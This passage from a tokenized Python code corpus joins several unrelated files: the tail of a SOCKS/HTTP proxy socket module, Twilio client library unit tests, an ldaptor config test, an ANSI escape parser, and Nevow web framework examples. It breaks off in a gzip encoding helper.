] ) - <NUM_LIT> ] ) ) <EOL> else : <EOL> raise Socks4Error ( ( <NUM_LIT> , _socks4errors [ <NUM_LIT:4> ] ) ) <EOL> self . __proxysockname = ( socket . inet_ntoa ( resp [ <NUM_LIT:4> : ] ) , struct . unpack ( "<STR_LIT>" , resp [ <NUM_LIT:2> : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] ) <EOL> if rmtrslv != None : <EOL> self . __proxypeername = ( socket . inet_ntoa ( ipaddr ) , destport ) <EOL> else : <EOL> self . __proxypeername = ( destaddr , destport ) <EOL> def __negotiatehttp ( self , destaddr , destport ) : <EOL> """<STR_LIT>""" <EOL> if not self . __proxy [ <NUM_LIT:3> ] : <EOL> addr = socket . gethostbyname ( destaddr ) <EOL> else : <EOL> addr = destaddr <EOL> self . sendall ( ( "<STR_LIT>" + addr + "<STR_LIT::>" + str ( destport ) + "<STR_LIT>" + "<STR_LIT>" + destaddr + "<STR_LIT>" ) . encode ( ) ) <EOL> resp = self . recv ( <NUM_LIT:1> ) <EOL> while resp . find ( "<STR_LIT>" . encode ( ) ) == - <NUM_LIT:1> : <EOL> resp = resp + self . recv ( <NUM_LIT:1> ) <EOL> statusline = resp . splitlines ( ) [ <NUM_LIT:0> ] . split ( "<STR_LIT:U+0020>" . encode ( ) , <NUM_LIT:2> ) <EOL> if statusline [ <NUM_LIT:0> ] not in ( "<STR_LIT>" . encode ( ) , "<STR_LIT>" . encode ( ) ) : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> try : <EOL> statuscode = int ( statusline [ <NUM_LIT:1> ] ) <EOL> except ValueError : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> if statuscode != <NUM_LIT:200> : <EOL> self . close ( ) <EOL> raise HTTPError ( ( statuscode , statusline [ <NUM_LIT:2> ] ) ) <EOL> self . __proxysockname = ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> self . __proxypeername = ( addr , destport ) <EOL> def connect ( self , destpair ) : <EOL> """<STR_LIT>""" <EOL> if ( not type ( destpair ) in ( list , tuple ) ) or ( len ( destpair ) < <NUM_LIT:2> ) or ( type ( destpair [ <NUM_LIT:0> ] ) != type ( '<STR_LIT>' ) ) or ( type ( destpair [ <NUM_LIT:1> ] ) != int ) : <EOL> raise GeneralProxyError ( ( <NUM_LIT:5> , _generalerrors [ <NUM_LIT:5> ] ) ) <EOL> if self . __proxy [ <NUM_LIT:0> ] == PROXY_TYPE_SOCKS5 : <EOL> if self . __proxy [ <NUM_LIT:2> ] != None : <EOL> portnum = self . __proxy [ <NUM_LIT:2> ] <EOL> else : <EOL> portnum = <NUM_LIT> <EOL> _orgsocket . connect ( self , ( self . __proxy [ <NUM_LIT:1> ] , portnum ) ) <EOL> self . __negotiatesocks5 ( destpair [ <NUM_LIT:0> ] , destpair [ <NUM_LIT:1> ] ) <EOL> elif self . __proxy [ <NUM_LIT:0> ] == PROXY_TYPE_SOCKS4 : <EOL> if self . __proxy [ <NUM_LIT:2> ] != None : <EOL> portnum = self . __proxy [ <NUM_LIT:2> ] <EOL> else : <EOL> portnum = <NUM_LIT> <EOL> _orgsocket . connect ( self , ( self . __proxy [ <NUM_LIT:1> ] , portnum ) ) <EOL> self . __negotiatesocks4 ( destpair [ <NUM_LIT:0> ] , destpair [ <NUM_LIT:1> ] ) <EOL> elif self . __proxy [ <NUM_LIT:0> ] == PROXY_TYPE_HTTP : <EOL> if self . __proxy [ <NUM_LIT:2> ] != None : <EOL> portnum = self . __proxy [ <NUM_LIT:2> ] <EOL> else : <EOL> portnum = <NUM_LIT> <EOL> _orgsocket . connect ( self , ( self . __proxy [ <NUM_LIT:1> ] , portnum ) ) <EOL> self . __negotiatehttp ( destpair [ <NUM_LIT:0> ] , destpair [ <NUM_LIT:1> ] ) <EOL> elif self . __proxy [ <NUM_LIT:0> ] == None : <EOL> _orgsocket . connect ( self , ( destpair [ <NUM_LIT:0> ] , destpair [ <NUM_LIT:1> ] ) ) <EOL> else : <EOL> raise GeneralProxyError ( ( <NUM_LIT:4> , _generalerrors [ <NUM_LIT:4> ] ) ) </s>
<s> from base import TestbedTest <EOL> from models import InternalEvent <EOL> from handlers import admin <EOL> class AdminTest ( TestbedTest ) : <EOL> def test_no_setup ( self ) : <EOL> self . assertFalse ( admin . setup_occurred ( ) ) <EOL> def test_finished_setup ( self ) : <EOL> admin . finish_setup ( ) <EOL> self . assertTrue ( admin . setup_occurred ( ) ) </s>
<s> import unittest <EOL> from mock import patch <EOL> from tests . tools import create_mock_json <EOL> from twilio . rest . resources . monitor . events import Events <EOL> AUTH = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> BASE_URI = "<STR_LIT>" <EOL> EVENT_SID = "<STR_LIT>" <EOL> class EventTest ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT:200> <EOL> request . return_value = resp <EOL> uri = "<STR_LIT>" . format ( BASE_URI , EVENT_SID ) <EOL> list_resource = Events ( BASE_URI , AUTH ) <EOL> list_resource . get ( EVENT_SID ) <EOL> request . assert_called_with ( "<STR_LIT:GET>" , uri , auth = AUTH , use_json_extension = False ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_list ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT:200> <EOL> request . return_value = resp <EOL> uri = "<STR_LIT>" . format ( BASE_URI ) <EOL> list_resource = Events ( BASE_URI , AUTH ) <EOL> list_resource . list ( ) <EOL> request . assert_called_with ( "<STR_LIT:GET>" , uri , params = { } , auth = AUTH , use_json_extension = False ) </s>
<s> import unittest <EOL> from nose . tools import assert_equal <EOL> from mock import Mock , patch , ANY <EOL> from tests . tools import create_mock_json <EOL> from twilio . rest . resources import Call , Calls <EOL> AUTH = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> class CallFeedbackTest ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_call_feedback ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> request . return_value = resp <EOL> mock = Mock ( ) <EOL> mock . uri = '<STR_LIT>' <EOL> call = Call ( mock , '<STR_LIT>' ) <EOL> call . load_subresources ( ) <EOL> feedback = call . feedback . get ( ) <EOL> assert_equal ( <NUM_LIT:5> , feedback . quality_score , <NUM_LIT:5> ) <EOL> assert_equal ( [ '<STR_LIT>' , '<STR_LIT>' ] , feedback . issues ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_create_call_feedback ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT> <EOL> request . return_value = resp <EOL> mock = Mock ( ) <EOL> mock . uri = '<STR_LIT>' <EOL> mock . auth = AUTH <EOL> call = Call ( mock , '<STR_LIT>' ) <EOL> call . load_subresources ( ) <EOL> feedback = call . feedback . create ( <EOL> quality_score = <NUM_LIT:5> , <EOL> issues = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) <EOL> exp_data = { <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> assert_equal ( <NUM_LIT:5> , feedback . quality_score , <NUM_LIT:5> ) <EOL> assert_equal ( [ '<STR_LIT>' , '<STR_LIT>' ] , feedback . issues ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT:POST>" , "<STR_LIT>" , <EOL> data = exp_data , auth = AUTH , <EOL> timeout = ANY , use_json_extension = True , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_create_call_feedback_one_request ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT> <EOL> request . return_value = resp <EOL> base_uri = '<STR_LIT>' <EOL> account_sid = '<STR_LIT>' <EOL> auth = ( account_sid , "<STR_LIT>" ) <EOL> calls = Calls ( base_uri , auth ) <EOL> uri = "<STR_LIT>" % base_uri <EOL> feedback = calls . feedback ( <EOL> '<STR_LIT>' , <EOL> quality_score = <NUM_LIT:5> , <EOL> issue = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> exp_data = { <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> assert_equal ( [ '<STR_LIT>' , '<STR_LIT>' ] , feedback . issues ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT:POST>" , uri , <EOL> data = exp_data , auth = auth , <EOL> use_json_extension = True , <EOL> ) <EOL> class CallFeedbackSummaryTest ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_call_feedback_summary ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> request . return_value = resp <EOL> base_uri = '<STR_LIT>' <EOL> account_sid = '<STR_LIT>' <EOL> auth = ( account_sid , "<STR_LIT>" ) <EOL> calls = Calls ( base_uri , auth ) <EOL> uri = "<STR_LIT>" % base_uri <EOL> feedback = calls . summary . get ( ) <EOL> assert_equal ( <NUM_LIT> , feedback . call_count ) <EOL> assert_equal ( <NUM_LIT> , feedback . call_feedback_count ) <EOL> request . assert_called_with ( '<STR_LIT:GET>' , uri , params = { } , auth = auth , <EOL> use_json_extension = True ) </s>
<s> import unittest <EOL> from mock import Mock , patch <EOL> from nose . tools import assert_equal , assert_true <EOL> from tests . tools import create_mock_json <EOL> from twilio . rest . resources . trunking . phone_numbers import ( <EOL> PhoneNumbers <EOL> ) <EOL> API_BASE_URI = "<STR_LIT>" <EOL> ACCOUNT_SID = "<STR_LIT>" <EOL> PHONE_NUMBERS_BASE_URI = "<STR_LIT>" . format ( API_BASE_URI , ACCOUNT_SID , <EOL> "<STR_LIT>" ) <EOL> AUTH = ( ACCOUNT_SID , "<STR_LIT>" ) <EOL> BASE_URI = "<STR_LIT>" <EOL> class PhoneNumbersTest ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_phone_numbers_lists ( self , request ) : <EOL> resp = create_mock_json ( <EOL> '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT:200> <EOL> request . return_value = resp <EOL> phone_numbers = PhoneNumbers ( BASE_URI , AUTH ) <EOL> result = phone_numbers . list ( ) <EOL> assert_equal ( len ( result ) , <NUM_LIT:1> ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . sid , '<STR_LIT>' ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . account_sid , <EOL> '<STR_LIT>' ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . trunk_sid , "<STR_LIT>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . friendly_name , "<STR_LIT:Name>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . phone_number , "<STR_LIT>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . api_version , "<STR_LIT>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . voice_caller_id_lookup , False ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . voice_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . status_callback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . sms_url , <EOL> "<STR_LIT>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . sms_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . sms_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . address_requirements , "<STR_LIT:none>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . beta , False ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . url , <EOL> "<STR_LIT>" . <EOL> format ( BASE_URI ) ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . links [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" . format ( PHONE_NUMBERS_BASE_URI , <EOL> "<STR_LIT>" ) ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT:GET>" , <EOL> "<STR_LIT>" . format ( BASE_URI ) , <EOL> auth = AUTH , <EOL> params = { } , <EOL> use_json_extension = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_phone_numbers_instance ( self , request ) : <EOL> resp = create_mock_json ( <EOL> '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT:200> <EOL> request . return_value = resp <EOL> phone_numbers = PhoneNumbers ( BASE_URI , AUTH ) <EOL> result = phone_numbers . get ( '<STR_LIT>' ) <EOL> assert_equal ( result . sid , '<STR_LIT>' ) <EOL> assert_equal ( result . account_sid , '<STR_LIT>' ) <EOL> assert_equal ( result . trunk_sid , "<STR_LIT>" ) <EOL> assert_equal ( result . friendly_name , "<STR_LIT:Name>" ) <EOL> assert_equal ( result . phone_number , "<STR_LIT>" ) <EOL> assert_equal ( result . api_version , "<STR_LIT>" ) <EOL> assert_equal ( result . voice_caller_id_lookup , False ) <EOL> assert_equal ( result . voice_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . status_callback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . sms_url , <EOL> "<STR_LIT>" ) <EOL> assert_equal ( result . sms_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . sms_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . address_requirements , "<STR_LIT:none>" ) <EOL> assert_equal ( result . beta , False ) <EOL> assert_equal ( result . url , <EOL> "<STR_LIT>" . format ( <EOL> BASE_URI ) ) <EOL> assert_equal ( result . links [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" . format ( PHONE_NUMBERS_BASE_URI , <EOL> "<STR_LIT>" ) ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT:GET>" , <EOL> "<STR_LIT>" . format ( <EOL> BASE_URI ) , <EOL> auth = AUTH , <EOL> use_json_extension = False <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_associate_phone_numbers_instance ( self , request ) : <EOL> resp = create_mock_json ( <EOL> '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT> <EOL> request . return_value = resp <EOL> phone_numbers = PhoneNumbers ( BASE_URI , AUTH ) <EOL> result = phone_numbers . create ( '<STR_LIT>' ) <EOL> assert_equal ( result . sid , '<STR_LIT>' ) <EOL> assert_equal ( result . account_sid , '<STR_LIT>' ) <EOL> assert_equal ( result . trunk_sid , "<STR_LIT>" ) <EOL> assert_equal ( result . friendly_name , "<STR_LIT:Name>" ) <EOL> assert_equal ( result . phone_number , "<STR_LIT>" ) <EOL> assert_equal ( result . api_version , "<STR_LIT>" ) <EOL> assert_equal ( result . voice_caller_id_lookup , False ) <EOL> assert_equal ( result . voice_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . status_callback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . sms_url , <EOL> "<STR_LIT>" ) <EOL> assert_equal ( result . sms_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . sms_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . address_requirements , "<STR_LIT:none>" ) <EOL> assert_equal ( result . beta , False ) <EOL> assert_equal ( result . url , <EOL> "<STR_LIT>" . format ( <EOL> BASE_URI ) ) <EOL> assert_equal ( result . links [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" . format ( PHONE_NUMBERS_BASE_URI , <EOL> "<STR_LIT>" ) ) <EOL> data_dict = dict ( ) <EOL> data_dict [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> request . assert_called_with ( <EOL> "<STR_LIT:POST>" , <EOL> "<STR_LIT>" . format ( BASE_URI ) , <EOL> auth = AUTH , <EOL> use_json_extension = False , <EOL> data = data_dict , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_disassociate_phone_numbers_instance ( self , request ) : <EOL> resp = Mock ( ) <EOL> resp . status_code = <NUM_LIT> <EOL> request . return_value = resp <EOL> phone_numbers = PhoneNumbers ( BASE_URI , AUTH ) <EOL> result = phone_numbers . delete ( '<STR_LIT>' ) <EOL> assert_true ( result ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" . format ( <EOL> BASE_URI ) , <EOL> auth = AUTH , <EOL> use_json_extension = False <EOL> ) </s>
<s> from . . import NextGenInstanceResource , NextGenListResource <EOL> class IpAccessControlList ( NextGenInstanceResource ) : <EOL> """<STR_LIT>""" <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . parent . delete_instance ( self . name ) <EOL> class IpAccessControlLists ( NextGenListResource ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> instance = IpAccessControlList <EOL> key = "<STR_LIT>" <EOL> def list ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( IpAccessControlLists , self ) . list ( ** kwargs ) <EOL> def create ( self , ip_access_control_list_sid ) : <EOL> """<STR_LIT>""" <EOL> data = { <EOL> '<STR_LIT>' : ip_access_control_list_sid <EOL> } <EOL> return self . create_instance ( data ) <EOL> def delete ( self , ip_access_control_list_sid ) : <EOL> """<STR_LIT>""" <EOL> return self . delete_instance ( ip_access_control_list_sid ) </s>
<s> """<STR_LIT>""" <EOL> from imaginary . creation import CreationPluginHelper , createCreator <EOL> thingPlugin = CreationPluginHelper ( "<STR_LIT>" , createCreator ( ) ) </s>
<s> def getInt ( i ) : <EOL> d = '<STR_LIT>' <EOL> for c in i : <EOL> if not c . isdigit ( ) : <EOL> return d , c <EOL> d = d + c <EOL> ss = '<STR_LIT>' <EOL> BEGIN , END , ADD , NUMBER , CHAR , ATTS , STR = range ( <NUM_LIT:7> ) <EOL> def tokenize ( s ) : <EOL> s = iter ( s ) <EOL> for c in s : <EOL> if c != '<STR_LIT>' : <EOL> yield CHAR , c <EOL> continue <EOL> c = s . next ( ) <EOL> if c != '<STR_LIT:[>' : <EOL> yield CHAR , '<STR_LIT>' <EOL> yield CHAR , c <EOL> continue <EOL> yield BEGIN , c <EOL> while <NUM_LIT:1> : <EOL> d , c = getInt ( s ) <EOL> yield NUMBER , d <EOL> if c == '<STR_LIT:m>' : <EOL> yield END , c <EOL> break <EOL> def parser ( tokens ) : <EOL> tokens = iter ( tokens ) <EOL> sofar = '<STR_LIT>' <EOL> for tp , token in tokens : <EOL> if tp == CHAR : <EOL> sofar += token <EOL> if tp == BEGIN : <EOL> if sofar : <EOL> yield STR , sofar <EOL> sofar = '<STR_LIT>' <EOL> atts = [ ] <EOL> for tp , token in tokens : <EOL> if tp == END : <EOL> break <EOL> atts . append ( int ( token ) ) <EOL> yield ATTS , atts <EOL> if sofar : <EOL> yield STR , sofar <EOL> sofar = '<STR_LIT>' <EOL> def prettylist ( l ) : <EOL> res = [ ] <EOL> for tp , data in l : <EOL> if tp == ATTS : <EOL> res . append ( '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( map ( str , data ) ) + '<STR_LIT>' ) <EOL> else : <EOL> res . append ( repr ( data ) + '<STR_LIT:\n>' ) <EOL> return '<STR_LIT>' . join ( res ) <EOL> def prettystring ( s ) : <EOL> return prettylist ( ( parser ( tokenize ( s ) ) ) ) <EOL> def _test ( ) : <EOL> print prettystring ( ss ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial import unittest <EOL> import os <EOL> from ldaptor import config <EOL> def writeFile ( path , content ) : <EOL> f = file ( path , '<STR_LIT:w>' ) <EOL> f . write ( content ) <EOL> f . close ( ) <EOL> class TestConfig ( unittest . TestCase ) : <EOL> def testSomething ( self ) : <EOL> self . dir = self . mktemp ( ) <EOL> os . mkdir ( self . dir ) <EOL> self . f1 = os . path . join ( self . dir , '<STR_LIT>' ) <EOL> writeFile ( self . f1 , """<STR_LIT>""" ) <EOL> self . f2 = os . path . join ( self . dir , '<STR_LIT>' ) <EOL> writeFile ( self . f2 , """<STR_LIT>""" ) <EOL> self . cfg = config . loadConfig ( <EOL> configFiles = [ self . f1 , self . f2 ] , <EOL> reload = True ) <EOL> val = self . cfg . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( val , '<STR_LIT>' ) <EOL> val = self . cfg . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( val , '<STR_LIT>' ) <EOL> class IdentitySearch ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . dir = self . mktemp ( ) <EOL> os . mkdir ( self . dir ) <EOL> self . f1 = os . path . join ( self . dir , '<STR_LIT>' ) <EOL> writeFile ( self . f1 , """<STR_LIT>""" ) <EOL> self . cfg = config . loadConfig ( <EOL> configFiles = [ self . f1 ] , <EOL> reload = True ) <EOL> self . config = config . LDAPConfig ( ) <EOL> def testConfig ( self ) : <EOL> self . assertEquals ( self . config . getIdentitySearch ( '<STR_LIT:foo>' ) , <EOL> '<STR_LIT>' ) <EOL> def testCopy ( self ) : <EOL> conf = self . config . copy ( identitySearch = '<STR_LIT>' ) <EOL> self . assertEquals ( conf . getIdentitySearch ( '<STR_LIT:foo>' ) , <EOL> '<STR_LIT>' ) <EOL> def testInitArg ( self ) : <EOL> conf = config . LDAPConfig ( identitySearch = '<STR_LIT>' ) <EOL> self . assertEquals ( conf . getIdentitySearch ( '<STR_LIT:foo>' ) , <EOL> '<STR_LIT>' ) </s>
<s> from twisted . internet import reactor <EOL> from twisted . internet . defer import succeed <EOL> from nevow . appserver import NevowSite <EOL> from nevow . rend import Page , Fragment <EOL> from nevow . page import Element , renderer <EOL> from nevow . loaders import stan <EOL> from nevow . tags import directive , div , span <EOL> class Static : <EOL> docFactory = stan ( "<STR_LIT>" * <NUM_LIT:100> ) <EOL> class StaticFragment ( Static , Fragment ) : <EOL> pass <EOL> class StaticElement ( Static , Element ) : <EOL> pass <EOL> class Tiny : <EOL> docFactory = stan ( div ( render = directive ( "<STR_LIT:foo>" ) ) ) <EOL> class TinyFragment ( Tiny , Fragment ) : <EOL> def render_foo ( self , ctx , data ) : <EOL> return ctx . tag [ span [ "<STR_LIT:result>" ] ] <EOL> class TinyElement ( Tiny , Element ) : <EOL> def foo ( self , request , tag ) : <EOL> return tag [ span [ "<STR_LIT:result>" ] ] <EOL> renderer ( foo ) <EOL> class Huge : <EOL> docFactory = stan ( div [ [ <EOL> div ( render = directive ( "<STR_LIT:foo>" ) ) <EOL> for x in range ( <NUM_LIT:100> ) ] ] ) <EOL> class HugeFragment ( Huge , Fragment ) : <EOL> def render_foo ( self , ctx , data ) : <EOL> return ctx . tag [ span [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:!>" ] ] <EOL> class HugeElement ( Huge , Element ) : <EOL> def foo ( self , request , tag ) : <EOL> return tag [ span [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:!>" ] ] <EOL> renderer ( foo ) <EOL> class Nested : <EOL> docFactory = stan ( div ( render = directive ( "<STR_LIT:foo>" ) ) ) <EOL> def __init__ ( self , count = <NUM_LIT:6> ) : <EOL> self . count = count <EOL> class NestedFragment ( Nested , Fragment ) : <EOL> def render_foo ( self , ctx , data ) : <EOL> if self . count : <EOL> return span [ NestedFragment ( self . count - <NUM_LIT:1> ) ] <EOL> return ctx . tag [ "<STR_LIT>" ] <EOL> class NestedElement ( Nested , Element ) : <EOL> def foo ( self , request , tag ) : <EOL> if self . count : <EOL> return span [ NestedFragment ( self . count - <NUM_LIT:1> ) ] <EOL> return tag [ "<STR_LIT>" ] <EOL> renderer ( foo ) <EOL> class Deferred : <EOL> docFactory = stan ( div ( render = directive ( '<STR_LIT:foo>' ) ) ) <EOL> class DeferredFragment ( Deferred , Fragment ) : <EOL> def render_foo ( self , ctx , data ) : <EOL> return ctx . tag [ succeed ( "<STR_LIT:foo>" ) ] <EOL> class DeferredElement ( Deferred , Element ) : <EOL> def foo ( self , request , tag ) : <EOL> return tag [ succeed ( "<STR_LIT:foo>" ) ] <EOL> renderer ( foo ) <EOL> class Compare ( Page ) : <EOL> def __init__ ( self , fragment , element ) : <EOL> self . fragment = fragment <EOL> self . element = element <EOL> def child_fragment ( self , ctx ) : <EOL> return Page ( docFactory = stan ( self . fragment ) ) <EOL> def child_element ( self , ctx ) : <EOL> return Page ( docFactory = stan ( self . element ) ) <EOL> class Root ( Page ) : <EOL> def child_static ( self , ctx ) : <EOL> return Compare ( StaticFragment ( ) , StaticElement ( ) ) <EOL> def child_tiny ( self , ctx ) : <EOL> return Compare ( TinyFragment ( ) , TinyElement ( ) ) <EOL> def child_huge ( self , ctx ) : <EOL> return Compare ( HugeFragment ( ) , HugeElement ( ) ) <EOL> def child_nested ( self , ctx ) : <EOL> return Compare ( NestedFragment ( ) , NestedElement ( ) ) <EOL> def child_deferred ( self , ctx ) : <EOL> return Compare ( DeferredFragment ( ) , DeferredElement ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> reactor . listenTCP ( <NUM_LIT> , NevowSite ( Root ( ) ) ) <EOL> reactor . run ( ) </s>
<s> from twisted . python import util <EOL> from nevow import inevow , rend , tags as t , loaders <EOL> class Root ( rend . Page ) : <EOL> addSlash = True <EOL> docFactory = loaders . xmlfile ( util . sibpath ( __file__ , '<STR_LIT>' ) ) <EOL> def data_ip ( self , ctx , data ) : <EOL> return inevow . IRequest ( ctx ) . client . host <EOL> def render_header ( self , ctx , data ) : <EOL> return ctx . tag [ Header ( data ) ] <EOL> def render_sidebar ( self , ctx , data ) : <EOL> ctx . tag . fillSlots ( '<STR_LIT>' , SideBar ( ) ) <EOL> return ctx . tag <EOL> def render_content ( self , ctx , data ) : <EOL> return ctx . tag [ Content ( ) ] <EOL> class Header ( rend . Fragment ) : <EOL> docFactory = loaders . stan ( <EOL> t . invisible [ <EOL> t . p ( render = t . directive ( "<STR_LIT>" ) ) [ "<STR_LIT>" ] <EOL> ] <EOL> ) <EOL> def render_ip ( self , ctx , data ) : <EOL> return ctx . tag [ data ] <EOL> class SideBar ( rend . Fragment ) : <EOL> docFactory = loaders . stan ( <EOL> t . ul [ <EOL> t . li [ "<STR_LIT>" ] , <EOL> t . li [ "<STR_LIT>" ] , <EOL> t . li [ "<STR_LIT>" ] , <EOL> ] <EOL> ) <EOL> class Content ( rend . Fragment ) : <EOL> docFactory = loaders . stan ( <EOL> t . p [ """<STR_LIT>""" ] <EOL> ) </s>
<s> from nevow import rend , loaders , tags as t <EOL> from nevow . taglibrary import tabbedPane <EOL> class TabbedPage ( rend . Page ) : <EOL> addSlash = True <EOL> docFactory = loaders . stan ( <EOL> t . html [ <EOL> t . head [ <EOL> t . title [ "<STR_LIT>" ] , <EOL> tabbedPane . tabbedPaneGlue . inlineGlue <EOL> ] , <EOL> t . body [ <EOL> t . invisible ( data = t . directive ( "<STR_LIT>" ) , <EOL> render = tabbedPane . tabbedPane ) <EOL> ] <EOL> ] <EOL> ) <EOL> def data_pages ( self , ctx , data ) : <EOL> return { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : ( ( "<STR_LIT>" , t . p [ "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , t . p [ "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , t . p [ t . invisible ( <EOL> render = tabbedPane . tabbedPane , <EOL> data = { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( ( "<STR_LIT>" , t . p [ "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , t . p [ "<STR_LIT>" ] ) ) } ) ] <EOL> ) ) } </s>
<s> """<STR_LIT>""" <EOL> from gzip import GzipFile <EOL> from zope . interface import implements <EOL> from twisted . internet . defer import maybeDeferred , Deferred <EOL> from twisted . internet . interfaces import IConsumer <EOL> from nevow . inevow import IRequest , IResource <EOL> from nevow . appserver import errorMarker <EOL> from nevow . rend import NotFound <EOL> def parseAcceptEncoding ( value ) : <EOL> """<STR_LIT>""" <EOL> encodings = { } <EOL> if value . strip ( ) : <EOL> for pair in value . split ( '<STR_LIT:U+002C>' ) : <EOL> pair = pair . strip ( ) <EOL> if '<STR_LIT:;>' in pair : <EOL> params = pair . split ( '<STR_LIT:;>' ) <EOL> encoding = params [ <NUM_LIT:0> ] <EOL> params = dict ( param . split ( '<STR_LIT:=>' ) for param in params [ <NUM_LIT:1> : ] ) <EOL> priority = float ( params . get ( '<STR_LIT:q>' , <NUM_LIT:1.0> ) ) <EOL> else : <EOL> encoding = pair <EOL> priority = <NUM_LIT:1.0> <EOL> encodings [ encoding ] = priority <EOL> if '<STR_LIT>' not in encodings and '<STR_LIT:*>' not in encodings : <EOL> encodings [ '<STR_LIT>' ] = <NUM_LIT> <EOL> return encodings <EOL> class _ProxyDescriptor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __get__ ( self , oself , type = None ) : <EOL> """<STR_LIT>""" <EOL> if oself is None : <EOL> return self <EOL> return getattr ( oself . underlying , self . name ) <EOL> def __set__ ( self , oself , value ) : <EOL> """<STR_LIT>""" <EOL> setattr ( oself . underlying , self . name , value ) <EOL> def __delete__ ( self , oself ) : <EOL> """<STR_LIT>""" <EOL> delattr ( oself . underlying , self . name ) <EOL> def _makeBase ( ) : <EOL> 